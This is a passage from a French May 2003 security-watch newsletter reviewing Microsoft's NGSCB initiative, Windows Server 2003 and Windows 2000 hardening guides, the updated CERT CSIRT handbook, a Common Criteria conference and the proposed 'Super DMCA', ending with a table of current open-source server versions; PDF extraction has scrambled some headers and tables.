célèbre ‘Orange Book’ du DoD Américain,
Microsoft se propose de regrouper toutes les
fonctions critiques de sécurité au sein d’une
unité décisionnelle dénommée ‘NGSCB’ ou Next
Generation Secure Computing Base.
Implémentée
au
plus
bas
niveau
de
l’architecture, probablement sous la forme d’un
ensemble de composants spécialisés,
la
‘NGSCB’ doit répondre à des objectifs
identiques à ceux de la ‘TCB’ du DoD: renforcer
le niveau de sécurité en plaçant les éléments de
sécurité essentiels – données, clefs, fonctions
de décision – hors de portée de l’utilisateur et
des programmes s’exécutant sous son autorité.
Image extraite de la présentation Microsoft
La mise en application des principes de séparation des fonctions et de cloisonnement des contextes rendra ainsi plus
difficile le détournement des fonctions par un code ‘illicite’ ou ‘non autorisé’. Intervenant dès l’initialisation du matériel,
la ‘NGSCB’ aura notamment en charge le contrôle de l’intégrité et de la provenance des composants logiciels avant
chargement de ceux-ci. En l’absence d’une signature valide, ceux-ci ne pourront être chargés ...
Sur le plan théorique, cette initiative ne peut qu’aller dans le sens d’une amélioration du niveau de sécurité à condition
toutefois que la position dominante de Microsoft sur le marché ne conduise pas à mettre en place un système dont
toutes les clefs seraient détenues par le concepteur de l’architecture. Les levées de bouclier qui ont fait suite à la
première présentation de 'Palladium’ nous confirment les craintes des utilisateurs d’être à ‘la merci’ d’un fournisseur
et de ne plus pouvoir librement installer un système d’exploitation alternatif...
On notera que, bien qu’une première présentation du code de ‘NGSCB’ ait été effectuée durant la conférence
‘WinHEC’, aucune date n’a encore été annoncée par Microsoft vis à vis de la disponibilité d’un système d’exploitation
tirant parti de cette nouvelle architecture.
# Complément d'information
http://www.microsoft.com/presspass/press/2003/may03/05-06WinHEC2003KeynotePR.asp
http://www.microsoft.com/presspass/events/winhec/default.asp
http://www.microsoft.com/whdc/hwdev/platform/pcdesign/athPC.mspx
http://www.microsoft.com/presspass/features/2003/may03/05-07NGSCB.asp
http://www.microsoft.com/presspass/exec/craig/10-02trustworthywp.asp
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 11/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
IN
NF
FO
OR
RM
MA
AT
TIIO
ON
NS
SE
ET
T LE
EG
GIIS
SL
LA
AT
TIIO
ON
N
LES
INFORMATIONS
WINDOWS 2003
MICROSOFT – WINDOWS 2003 SECURITY GUIDE
# Description
Un guide de 290 pages intitulé ‘Windows Server 2003 Security Guide’ a été mis à disposition fin avril par le
département ‘Solutions for Security’ de la société Microsoft. Annoncé livré sécurisé par conception, par défaut et
dans son déploiement, le système ‘Windows 2003 Server’ offre cependant de nombreuses options de configuration
permettant d’affiner la politique de sécurité dans l’optique de l’adapter aux besoins spécifiques du contexte utilisateur.
Le guide proposé par Microsoft présente ainsi les différents paramètres de configuration sur lesquels l’exploitant
pourra intervenir afin d’adapter le système en implémentant une politique de sécurité plus ou moins restrictive. Trois
niveaux de sécurité sont décrits qui doivent théoriquement répondre à la majorité des configurations. Microsoft
annonce avoir validé ces niveaux et intensivement testé leur traduction sous la forme de paramètres de configuration.
Ce guide est organisé en 12 chapitres dont 10 chapitres dédiés à un thème spécifique et partageant une structuration
similaire comme le montre la table des matières du guide:
Introduction Windows Server 2003 Security Guide
Overview
Executive Summary
Who Should Read This Guide
Get Secure Stay Secure
Scope of this Guide
Content Overview
Skills and Readiness
Requirement
Style Conventions
Summary
2- Creating a Member Server Baseline
1- Configuring the Domain Infrastructure
Overview
Overview
Windows Server 2003 Baseline Policy
Domain Policy
Audit Policy 52
Account Policies
User Rights Assignments
Password Policy
Security Options
Account Lockout Policy
Event Log
Kerberos Policy
System Services
Security Options
Additional Registry Settings
Summary
Additional Security Settings
Summary
3- Hardening Domain Controllers
4- Hardening Infrastructure Servers
Overview
Overview
Audit Policy Settings
Audit Policy Settings
User Rights Assignements
User Rights Assignments
Security Options
Security Options
Event Log Settings
Event Log Settings
System Services
System Services
Additional Security Settings
Additional Security Settings
Summary
Summary
5 - Hardening File Servers
6 - Hardening Print Servers
Overview
Overview
Audit Policy Settings
Audit Policy Settings
User Rights Assignments
User Rights Assignments
Security Options
Security Options
Event Log Settings
Event Log Settings
System Services
System Services
Additional Security Settings
Additional Security Settings
Summary
Summary
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 12/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
7 - Hardening IIS Servers
Overview
Audit Policy Settings
User Rights Assignments
Security Options
Event Log Settings
System Services
Additional Security Settings
Summary
9 - Hardening Certificate Services Servers
Overview
Audit Policy Settings
User Rights Assignments
Security Options
Event Log Settings
System Services
Additional Registry Settings
Additional Security Settings
Summary
Conclusion
8 - Hardening IAS Servers
Overview
Audit Policy
User Rights Assignments
Security Options
Event Log
System Services
Additional Security Settings
Summary
10 - Hardening Bastion Hosts
Overview
Audit Policy Settings
User Rights Assignments
Security Options
Event Log Settings
System Services
Additional Security Settings
Summary
Ce guide est livré sous la forme d’un exécutable contenant le document au format PDF mais aussi de nombreux
documents complémentaires, fichiers et outils destinés à accompagner et faciliter la démarche.
Documents PDF
Le guide de sécurisation est accompagné des quatre documents suivants au format PDF:
• Release Notes
Ce document présente l’historique des révisions effectuées sur le guide de sécurisation.
• Delivering the Windows Server 2003 Security Guide
Cette présentation du cadre de travail proposé par Microsoft contient de nombreux pointeurs et références
vers les différentes méthodologies mises à la disposition des utilisateurs:
- MSF
Microsoft Security Framework
- MOF
Microsoft Operation Framework
- SRMD
Microsoft Security Risk Management Discipline
Ce cadre de travail est parfaitement synthétisé par le synoptique suivant extrait du document.
• Supporting the Windows Server 2003 Security Guide
Ce document décrit l’organisation mise en place par Microsoft pour assurer le support et la maintenance du
système Windows Server 2003 et des différents composants logiciels constituant celui-ci.
• Testing the Windows Server 2003 Security Guide
Ce dossier décrit en détail la procédure de test mise en œuvre pour valider chacun des principes et des règles
de sécurisation exposés dans le guide. Sont notamment présentées les infrastructures de test des trois
scénarios d’exploitation retenus: ‘Legacy client environnement’, ‘Enterprise Client Environnement’ et
enfin ‘High security client environnement’.
Modèles de sécurité
Les modèles de sécurité correspondant aux différents rôles d’un système sont proposés organisés en trois
catégories correspondant aux trois scénarios d’exploitation précédemment décrits. Ces modèles sont livrés sous la
forme d’un fichier ‘.inf’ exploitable par le biais de la console de sécurité.
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 13/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
Quelques 10 check-list sont par ailleurs proposées sous la forme d’un document au format WORD d’une page
contenant la liste récapitulative des actions à mener pour sécuriser un système ayant un rôle bien défini:
•
•
•
•
•
•
•
•
•
•
Legacy Client
Enterprise Client
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
SMTP Bastion Host
Member Server Baseline
Infrastructure Server
Domain Controller
Domain
File Server
Print Server
IAS Server
IIS Server
Certificate Services
X
High Security
X
X
X
X
X
X
X
X
Checklist
X
X
X
X
X
X
X
X
X
X
Scripts de configuration
Sept scripts s’appuyant sur la commande ‘NetSH’ sont livrés qui permettent de configurer le filtre de paquet
IPSEC pour les différents contextes d’utilisation du système.
•
•
•
•
•
•
•
Domain Controller
DHCP server
File Server
IIS Server
Print Server
WINS Server
SMTP Bastion server
Rejet
Rejet
Rejet
Rejet
Rejet
Rejet
Rejet
du
du
du
du
du
du
du
trafic
trafic
trafic
trafic
trafic
trafic
trafic
non
non
non
non
non
non
non
strictement
strictement
strictement
strictement
strictement
strictement
strictement
nécessaire
nécessaire
nécessaire
nécessaire
nécessaire
nécessaire
nécessaire
pour
pour
pour
pour
pour
pour
pour
un
un
un
un
un
un
un
contrôleur de domaine
serveur DHCP
serveur de fichier
serveur IIS
serveur d’impression
serveur WINS
serveur de protection SMTP
Scripts de validation
Douze scripts ‘.NET’ sont fournis qui permettent de vérifier le bon fonctionnement d’une configuration à partir des
éléments de paramétrage contenus dans le fichier ‘config’ livré avec les scripts.
• AdminChangePassword
Changement du mot de passe administrateur via l’objet ‘ldap:’
• UserChangePassWord
Changement du mot de passe utilisateur via l’objet ‘ldap:’
• AdminFileAccess
Copie des fichiers à partir d’un partage vers un autre partage
• UserFileAccess
Copie des fichiers à partir d’un partage vers un autre partage
• AdminLogon
Tentative de connexion administrateur via LDAP
• UserLogon
Tentative de connexion utilisateur via LDAP
• AdminPrint
Transmission d’un travail d’impression sur une imprimante
• UserPrint
Transmission d’un travail d’impression sur une imprimante
• AdminPrintQueues
Etat des queues d’impression via l’objet ‘winmgmts:’
• UserPrintQueues
Etat des queues d’impression via l’objet ‘winmgmts:’
• DirectoryQuery
Obtention du nom d’un utilisateur dans l’annuaire via l’objet ‘ldap:’
• Win2kReleaseIPRenewIP
Renouvellement d’un bail DHCP
On notera que ces scripts nous offrent d’excellents exemples de programmation de fonctions de test et de
validation en basic ‘.NET’.
Avec ce paquetage, Microsoft nous démontre sa capacité à répondre efficacement à la problématique du déploiement
et de la configuration d’une infrastructure complexe dans un environnement de production devant assurer un bon
niveau de sécurité.
Nous recommandons non seulement la lecture du guide de sécurisation mais aussi celle du dossier exposant la
méthodologie de test et de validation.
# Complément d'information
http://go.microsoft.com/fwlink/?LinkId=14845
MICROSOFT – WS2003 & XP THREATS AND COUNTERMEASURES GUIDE
# Description
Complémentaire du guide de sécurisation ‘Windows Server 2003 Security Guide’, ce second guide de 257 pages
dénommé ‘Threats & Countermeasures Guide’ livre une liste exhaustive des paramètres de configuration des
systèmes WS 2003 et XP.
Présenté organisé autour des sept thèmes utilisés dans le guide de sécurisation - à savoir ‘Domain Policy’, ‘Audit
Policy Settings’, ‘User Rights Assignments’, ‘Security Options’, ‘Event Log Settings’, ‘System Services’ et
‘Additional Security Settings’ - chaque paramètre est présenté en indiquant :
- son domaine de validité,
- la vulnérabilité ou le risque associé à la manipulation de ce paramètre,
- la contre-mesure proposée visant à limiter le risque,
- et enfin l’impact potentiel d’une modification du paramètre sur le fonctionnement du système.
Un extrait de la table des matières de cette véritable mine d’information est proposé ci-dessous :
1- Domain level Policies
Account Policies
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Account Lockout Policy
Kerberos Policy
Page 14/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
Audit Policy
2- User Rights Assignment
3- Security Options
Accounts
Audit
Devices
Domain controller
Domain member
Interactive logon
Microsoft network client and server
Microsoft network client
Microsoft network server
Network access
Network security
Recovery console
Shutdown
System cryptography
System objects
System settings
4- Event Log
5- System Services
Services Overview
Services Description
Alerter
Application Layer Gateway Service
Application Management
ASP
Automatic Updates
Background Intelligent Transfer Service
Certificate Services
Client Service for NetWare
ClipBook
Cluster Service
COM+ Event Services
COM+ System Application
Computer Browser
Cryptographic Services
DHCP Client
DHCP Server
Distributed File System
Distributed Link Tracking Client
Distributed Link Tracking Server
Distributed Transaction Coordinator
DNS Client
DNS Service
Error Reporting Service
Event Log
Fax Service
File Replication
File Server for Macintosh
FTP Publishing Service
Help and Support
HTTP Server
Human Interface Device Access
IAS Jet Database Access
IIS Admin Service
IMAPI CD ΠBurning COM Service
Indexing Service
Infrared Monitor
Internet Authentication Service
Internet Connection Firewall
Intersite Messaging
IP Version 6 Helper Service
IPSec Policy Agent (IPSec Service)
Kerberos Key Distribution Center
License Logging Service
Logical Disk Manager
Logical Disk Manager Administrative Service
Message Queuing
Message Queuing Down Level Clients
Message Queuing Triggers
Messenger
Microsoft POP3 Service
MS Software Shadow Copy Provider
MSSQL$UDDI
MSSQLServerADHelper
Net Logon
NetMeeting Remote Desktop Sharing
Network Connections
Network DDE
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Network DDE DSDM
Network Location Awareness (NLA)
Network News Transport Protocol (NNTP)
NTLM Security Support Provider
Performance Logs and Alerts
Plug and Play
Portable Media Serial Number
Print Server for Macintosh
Print Spooler
Protected Storage
Remote Access Auto Connection Manager
Remote Access Connection Manager
Remote Administration Service
Remote Desktop Help Session Manager
Remote Installation
Remote Procedure Call (RPC)
Remote Procedure Call (RPC) Locator
Remote Registry Service
Remote Server Manager
Remote Server Monitor
Remote Storage Notification
Remote Storage Server
Removable Storage
Resultant Set of Policy Provider
Routing and Remote Access
SAP Agent
Secondary Logon
Security Accounts Manager
Server
Shell Hardware Detection
Simple Mail Transport Protocol (SMTP)
Simple TCP/IP Services
Single Instance Storage Groveler
Smart Card
SNMP Service
SNMP Trap Service
Special Administration Console Helper
SQLAgent$* (* UDDI or WebDB)
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper Service
TCP/IP Print Server
Telephony
Telnet
Terminal Services
Terminal Services Licensing
Terminal Services Session Directory
Themes
Trivial FTP Daemon
Uninterruptible Power Supply
Upload Manager
Virtual Disk Service
Volume Shadow Copy
WebClient
Web Element Manager
Windows Audio
Windows Image Acquisition (WIA)
Windows Installer
Windows Internet Name Service (WINS)
Windows Management Instrumentation
Windows Management Instrumentation Driver
Windows Media Services
Windows System Resource Manager
Windows Time
WinHTTP Web Proxy Auto ΠDiscovery Service
Wireless Configuration
WMI Performance Adapter
Workstation
World Wide Web Publishing Service
Software Restriction Policies
Windows XP, Office XP, & WS 2003 Adm Templates
Additional Registry Settings
Modify the Security Configuration Editor User Interface
Security Considerations for Network Attacks
AFD
Additional Member Server Hardening Procedures
Securing the Accounts
NTFS
Data and Application Segmentation
Configure SNMP Community Name
Disable NetBIOS and SMB on Public Facing Interfaces
Page 15/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
Configure Terminal Services Port
Configure IPSec Policies
Conclusion
More Information
Avec ce guide, Microsoft nous offre enfin le document de référence tant attendu qui permettra à chacun de s’y
retrouver dans le véritable dédale des paramètres de configuration de la sécurité du système. Microsoft nous offrira-til un jour une version complète portant sur tous les paramètres existants et non pas seulement sur les paramètres liés
à la sécurité ?
# Complément d'information
http://go.microsoft.com/fwlink/?LinkId=15159
WINDOWS 2000
MICROSOFT – WINDOWS 2000 HARDENING GUIDE
# Description
En avril 2001, Philip Cox nous proposait un extrait de son livre 'Windows 2000 Security Handbook' portant sur la
sécurisation des systèmes Windows 2000 (Rapport N°33 – Avril 2001). La partie présentée avait ainsi pour vocation de
guider l’utilisateur vers une méthode de sécurisation des systèmes d’exploitation Windows 2000 Server, et par
extension Windows 2000 Professional.
La NSA, l’agence de sécurité américaine, prenait ensuite le relais avec une série de 17 documents entièrement
consacrés à la sécurité de Windows 2000 et d’un guide de sécurisation dédié au système Windows XP.
Microsoft réagit enfin en nous livrant son propre guide de sécurisation intitulé ‘Windows 2000 Hardening Guide’.
Constitué de 128 pages et livré au format WORD, ce guide porte sur les deux versions du système d’exploitation –
‘Professional’ et ‘Server’ – en s’intéressant aux différents rôles pouvant être dévolus à celles-ci : station ou portable
membre d’un domaine, station indépendante, contrôleur de domaine, serveur membre d’un domaine ou encore
serveur autonome.
Bénéficiant des meilleurs sources d’information car directement rédigé par une équipe de l’éditeur, ce guide est plus
complet et plus didactique que ses deux homologues dont notamment le guide de la ‘NSA’. On appréciera le style
rédactionnel de ce document pour lequel les auteurs ne se sont pas contenté d’aligner des listes de paramètres de
configuration. La présence de nombreux tableaux récapitulatifs - en particulier les trois tableaux fournis en annexe facilite notablement la lecture de ce guide dont la table des matières est la suivante :
1. INTRODUCTION
2. SYSTEM CONFIGURATIONS
2.1 BUILT-IN GROUPS
3. OPERATING SYSTEM INSTALLATION
3.1 PREPARING FOR INSTALLATION
3.2 WINDOWS 2000 INSTALLATION PROCESS
3.2.1 Installation Methods
3.2.2 Initiating the Installation from a Bootable CD-ROM
3.2.3 Convert a Windows 2000 Server to a Domain Controller
3.3 CHOOSING GOOD PASSWORDS
3.3.1 Windows 2000 Password Representations
3.3.2 What constitutes a good password?
3.4 WINDOWS 2000 SERVICE PACK CONSIDERATIONS
4. SECURITY CONFIGURATION
4.1 WINDOWS 2000 SECURITY POLICIES
4.1.1 Local Security Policy
4.1.2 Domain Security Policy
4.1.3 Organizational Unit Group Policy Objects
4.2 ADDITIONAL SECURITY CONFIGURATION INTERFACES
4.2.1 Security Configuration Editor
4.2.2 Other tools
5. SECURITY CONFIGURATION
5.1 ACCOUNT POLICIES
5.1.1 Password Policy
5.1.2 Account Lockout Policy
5.1.3 Access the Kerberos Policy Settings
5.2 LOCAL POLICIES
5.2.1 Audit Policy
5.2.2 Logon Rights and Privileges
5.2.3 Modify Security Options
5.2.4 Additional Security Settings
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 16/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
5.3
AUDIT LOG MANAGEMENT
5.3.1 Access the Settings for Event Logs
5.4 DEFAULT GROUP ACCOUNTS
5.4.1 Review / Modify Group Account Memberships for a Domain
5.4.2 Review / Modify Group Account Memberships for a Standalone or Member Computer
5.4.3 Change the Primary Group Membership of an Account
5.5 DEFAULT USER ACCOUNTS
5.5.1 Review / Modify Default User Accounts for a Domain
5.5.2 Review / Modify Default User Accounts Locally
5.6 SYSTEM SERVICES
5.6.1 Disable Unnecessary System Services on Domain Computers
5.6.2 Disable Unnecessary System Services Locally
5.6.3 Minimum System Services
5.7 SECURING THE FILE SYSTEM
5.7.1 Set Permissions through a Domain Policy
5.7.2 Set Permissions Locally through the Security Configuration Editor
5.8 SHARE FOLDER PERMISSIONS
5.9 SECURING THE REGISTRY
5.9.1 Set Registry Permissions through a Domain Policy
5.9.2 Set Registry Permissions through Regedt32.exe
5.10 IPSEC POLICY
5.11 Encrypting File System
5.12 Enable Automatic Screen Lock Protection
5.13 Update The System Emergency Repair Disk
6. WINDOWS 2000 HARDENING GUIDE CONFIGURATION TEMPLATES
6.1 TEMPLATE MODIFICATIONS AND MANUAL SETTINGS
6.2 SECURITY CONFIGURATION TEMPLATE APPLICATION TOOLS
6.3 MANAGING AND APPLYING SECURITY CONFIGURATION SECURITY TEMPLATES
6.3.1 Extending the security configuration editor interface
6.3.2 Viewing and editing a security configuration template
6.3.3 Applying a security template to a local computer
6.3.4 Deploying a security template to an Active Directory object security policy
7. REFERENCES
APPENDIX A - WINDOWS 2000 DEFAULT SECURITY POLICY SETTINGS
APPENDIX B – USER RIGHTS AND PRIVILEGES
APPENDIX C - WINDOWS 2000 SECURITY CONFIGURATION CHECKLIST
Sept modèles de sécurité correspondant aux principaux rôles d’un système Windows 2000 sont livrés sous la forme
d’un fichier ‘.inf’ exploitable par le biais de la console de sécurité. Un script nommé ‘installScereglv’ permet
d’automatiser l’opération de mise à jour de la liste des scripts et d’enregistrer ceux-ci sur la console.
Les modèles suivants sont fournis dans le paquetage contenant la version téléchargeable du guide:
•
•
•
•
•
•
•
Configuration commune
Station autonome
Serveur autonome
Portable membre d’un domaine
Station membre d’un domaine
Serveur membre d’un domaine
Contrôleur de domaine
Script
Script
Script
Script
Script
Script
Script
‘W2KHG-baseline’
‘W2KHG-StandaloneWKS’
‘W2KHG-StandaloneServer’
‘W2KHG-MemberLaptop’
‘W2KHG-MemberWKS’
‘W2KHG-MemberServer’
‘W2KHG-DomainController’
Le lecteur aura noté la prise en compte des spécificités liées aux postes de travail portables de plus en plus
couramment rencontrés dans l’entreprise par le biais d’un modèle dédié mais aussi qu’il aura fallu attendre plus de 3
ans pour pouvoir disposer de la part de l’éditeur d’un guide de sécurisation réellement exploitable.
# Complément d'information
http://www.microsoft.com/technet/security/prodtech/windows/win2khg.asp
http://www.microsoft.com/downloads/details.aspx?FamilyID=15E83186-A2C8-4C8F-A9D0-A0201F639A56&DisplayLang=en
PREVENTION
CMU/SEI – MISE A JOUR DU ‘CSIRT HANBOOK’
# Description
Quelques 5 ans après la publication de la première version du ‘CSIRT Handbook’,
la division ‘Software Engineering Institute’ de l’université de Carnegie-Mellon
nous propose une mise à jour de cet ouvrage de référence.
Intitulé ‘Handbook for Computer Security Incident Response Teams (CSIRTs)’, cet ouvrage de 223 pages a
pour objectif d’accompagner les organisations confrontées à la difficile tâche de la mise en place d’une équipe
spécialisée dans la gestion des incidents de sécurité ou ‘CSIRT’. Rappelons que ce sigle ‘barbare’ désigne
l’infrastructure mise en œuvre par de grandes organisations généralement privées dans l’optique de coordonner les
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 17/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
actions de gestion des incidents ayant une incidence sur la sécurité de leur système d’information.
Les différents points essentiels pour la réussite d’une telle démarche sont abordés en détail au long des 5 chapitres
constituant cet ouvrage dont un extrait de la table des matières est proposé ci-après.
1 Introduction
2 Basic Issues
2.1 CSIRT Framework
2.2 Service and Quality Framework
2.3 CSIRT Services
2.4 Information Flow
2.5 Policies
2.6 Quality Assurance
2.7 Adapting to Specific Needs
3 Incident Handling Service
3.1 Service Description
3.2 Service Functions Overview
3.3 Triage Function
3.4 Handling Function
3.5 Announcement Function
3.6 Feedback Function
3.7 Interactions
3.8 Information Handling
4 Team Operations
4.1 Operational Elements
4.2 Fundamental Policies
4.3 Continuity Assurance
4.4 Security Management
4.5 Staff Issues
5 Closing Remarks
5.1 Closing Remarks from the First Edition
5.2 Closing Remarks for the Second Edition
Appendix A: About the Authors
Appendix B: Glossary
Bibliography
Cette nouvelle édition reprend la structure et le fond de l’édition précédente mais se démarque de celle-ci par
l’intégration de la liste des services définie à la suite des travaux menés en commun avec les sociétés STELVIO
(chargé de la gestion et de l’habilitation des CSIRT en Europe) et PRESECURE (œuvrant dans le domaine de
l’assistance et de la formation). Le lecteur intéressé pourra se reporter au document intitulé ‘CSIRT Services’ qui
nous livre une description exhaustive et détaillée des services susceptibles d’être proposés par un ‘CSIRT’ (Rapport
N°53 – Décembre 2002).
Les autres modifications concernent :
- la mise à jour des différents exemples pratiques présentés tout au long du guide,
- l’alignement avec le tout nouveau guide intitulé ‘Organisational Models for CSIRTs’ annoncé disponible sous peu.
Nous avons particulièrement apprécié la présence en annexe d’un glossaire très complet et d’une bibliographie
conséquente et parfaitement à jour.
# Complément d'information
http://www.cert.org/archive/pdf/csirt-handbook.pdf
http://www.sei.cmu.edu/publications/documents/03.reports/03hb002.html
LA
LEGISLATION
CRITERES COMMUNS
CC – 4IEME CONFERENCE INTERNATIONALE
# Description
La 4ème conférence internationale ‘Critères communs’ aura lieu du 7 au 9 septembre 2003,
à Stockholm.
Les ‘Critères Communs’ ou ‘CCSec’ forment le cadre directeur, pour ne pas dire l’ossature d’une démarche de
rationalisation, de structuration et de normalisation des méthodologies d’évaluation et d’assurance de la sécurité des
systèmes d’information. Cette démarche a été engagée depuis plusieurs années, d’abord indépendamment par de
nombreux pays (USA, Canada, Europe avec les ITSEC) puis en commun, afin d’harmoniser les terminologies et
critères jusqu’alors utilisés. Cette harmonisation a donné lieu aux CCSEC V1.0, puis V2.0 (Mai 1998) et enfin V2.1
(Mai 1999).
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 18/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
Rappelons que cette dernière version résulte de l’adoption des Critères Communs en tant que Norme Internationale
(ISO 15408) ce qui a conduit à devoir aligner la version originale (2.0) notamment sur le plan de la présentation et
du vocabulaire (Rapport N°16 - Novembre 1999).
Les sessions de présentations sont organisées autour des cinq thèmes fédérateurs suivants :
Challenges for a New Millennium
Ce thème regroupe différentes présentations techniques ayant pour points communs les méthodologies applicables
mais aussi les nouveaux défis qui devront être pris en compte dans les futures versions des CCSec. Seront
notamment abordés les sujets suivants: la problématique de la définition d’une TOE (Cible d’évaluation) et les
profils de protections.
Le cas particulier de la compatibilité entre la norme ISO/IEC 17799 (BS 7799 partie 1) et l’exigence des CCSec
en matière de gestion du cycle de vie (ALC_DVS) devrait y être traité sous l’intitulé ‘Is Compliance With ISO/IEC
17799 Sufficient to Meet the CC Life-Cycle Requirements (ALC_DVS) ?’
Business Advantages for the private sector, benefits for the public, standardisation possibilities & need
L’objectif de ce thème est de mettre en évidence les gains substantiels qui pourront être retirés de la mise en
œuvre des ‘CCSec’ dans différents secteurs de l’industrie et du commerce mais aussi dans le cadre des
organisations publiques.
A cette fin, plusieurs exemples pratiques d’utilisation – ou de projets d’utilisation - des CCSec seront présentés.
The Economics of Evaluating and Certifying IT Security
Les CCSec seront ici abordés dans la perspective des avantages économiques et des services associés. Seront
notamment étudiés les facteurs économiques qui pilotent les schémas d’évaluation et de certification dans les
contextes civils, commerciaux et militaires.
Evaluation techniques and applications today
Ce thème aborde la problématique de la mise en œuvre concrète des CCSec en proposant un état des lieux
abordant des sujets d’actualité: projets initiés et retours d’expérience depuis la conférence de l’année précédente,
problèmes rencontrés à l’occasion de campagnes d’évaluation récentes, outils et environnements permettant de
simplifier la mise en œuvre d’une évaluation et de l’analyse technique.
Common Criteria in System Certification
Divisé en trois sessions, ce thème aborde un sujet d’actualité, celui du positionnement des CCSec dans le cadre
plus large des méthodologies de certification et d’audit et, plus particulièrement, vis à vis de la norme ISO 17799
(BS 7999 – partie 1) et d’ISMS (BS 7799 – partie 2).
# Complément d'information
http://www.iccconference.com/agenda/index.asp
http://www.commoncriteria.org/
DMCA
DMCA – SUR LA LEGALITE DES EQUIPEMENTS DE SECURITE
# Description
Une extension à la loi américaine dite DMCA (Digital Millenium Copyright Act) proposée en avril dernier par le MPAA
(Motion Picture Association of America) pourrait rendre illégale l’utilisation des pare-feu et autres dispositifs de
sécurité. Référencée sous la dénomination de ‘Super DMCA’, cette extension fait l’objet d’une très importante levée
de bouclier de la part de nombreuses associations et organisations dont la célèbre EFF (Electronic Frontier
Foundation).
Pour mémoire, six états américains - Delaware, Illinois, Michigan, Oregon, Pennsylvanie, Wyoming - ont déjà
publié leur propre amendement au DMCA dans le courant de l’année 2003 conduisant à la fermeture ou au
déplacement de nombreux sites ayant trait à la sécurité et aux technologies associées. D’ici la fin de l’année, sept
nouveaux états - Arkansas, Colorado, Floride, Georgie, Massachusetts, Tennessee et Texas - devraient eux
aussi mettre en application une telle extension.
A l’origine de cette polémique, un paragraphe présent dans la proposition de loi présentée par le MPAA stipulant qu’il
est notamment ‘criminel de posséder un dispositif permettant de recevoir, transmettre ou de retransmettre un
quelconque service de communication sans l’autorisation expresse du fournisseur de service’.
Ce simple paragraphe conduit à pouvoir déclarer illégal l’utilisation ou la possession d’un équipement de sécurité placé
en coupure dans un flux potentiellement ouvert par un tiers mais aussi de bien d’autres équipements, à commencer
par les récepteurs de radiocommunication.
Plus largement, quatre catégories d’activité sont explicitement visées par le super DMCA s’y l’on se réfère à l’analyse
proposée par l’EFF:
1. La possession, le développement, la distribution ou l’utilisation de tout dispositif de communication en rapport
avec un service de communication sans disposer de l’autorisation préalable du fournisseur de service,
2. Le masquage de l’origine ou de la destination de toute communication vis à vis du fournisseur de service,
3. La possession, le développement, la distribution ou l’utilisation de tout dispositif non conforme à la loi,
4. La publication de plans ou d’instructions permettant la réalisation d’un dispositif dont il est patent que celui-ci
puisse être utilisé en violation de la loi.
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 19/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
Le lecteur constatera l’ampleur de la menace que pourrait bien faire planer la mise en application générale de cette
proposition de loi aux Etats-Unis, non seulement sur le plan des libertés individuelles mais aussi sur le plan
commercial.
Page d’accueil de l’outil ‘LaBrea’
Site de Niels Provost
au 30 Avril 2003
au 31 Mars 2003
http://www.hackbusters.net/LaBrea/lbathome.html
http://www.citi.umich.edu/u/provos/
# Complément d'information
http://www.freedom-to-tinker.com/archives/000336.html
http://www.eff.org/IP/DMCA/states/200304_sdmca_eff_analysis.php
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 20/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
LO
OG
GIIC
CIIE
EL
LS
S LIIB
BR
RE
ES
S
LES
SERVICES DE BASE
Les dernières versions des services de base sont rappelées dans les tableaux suivants. Nous conseillons
d’assurer rapidement la mise à jour de ces versions, après qualification préalable sur une plate-forme
dédiée.
RESEAU
Nom
Fonction
BIND
Gestion de Nom (DNS) 9.2.2
03/03/03 http://www.isc.org/products/BIND
8.3.4
16/11/02
Serveur d’adresse
3.0p2
15/01/03 http://www.isc.org/products/DHCP/dhcp-v3.html
Serveur de temps
4.1.1c-rc2 26/04/03 http://www.ntp.org/downloads.html
Serveur de fichiers
2.6.2
29/11/01 http://www.wu-ftpd.org
DHCP
NTP4
WU-FTP
Ver.
Date
Source
MESSAGERIE
Nom
Fonction
Ver.
Date
IMAP4
POP3
SENDMAIL
Relevé courrier
Relevé courrier
Serveur de courrier
2002c1
4.0.5
8.12.9
18/04/03 ftp://ftp.cac.washington.edu/imap/
13/03/03 ftp://ftp.qualcomm.com/eudora/servers/unix/popper/
30/03/03 ftp://ftp.sendmail.org/pub/sendmail/RELEASE_NOTES
Source
Nom
Fonction
Ver.
Date
APACHE
Serveur WEB
WEB
ModSSL
$ MySQL
$ SQUID
1.3.27
2.0.45
API SSL Apache 1.3.27 2.8.14
Base SQL
3.23.56
4.013
Cache WEB
2.5s3
Source
03/10/02
30/03/03
23/10/02
13/03/03
16/05/03
25/05/03
http://httpd.apache.org/dist
http://www.modssl.org
http://www.mysql.com/doc/N/e/News-3.23.x.html
http://www.squid-cache.org
AUTRE
Nom
$ INN
MAJORDOMO
OpenCA
$ OpenLDAP
LES
Fonction
Ver.
Gestion
Gestion
Gestion
Gestion
2.4.0
1.94.5
0.9.1.1
2.1.19
des news
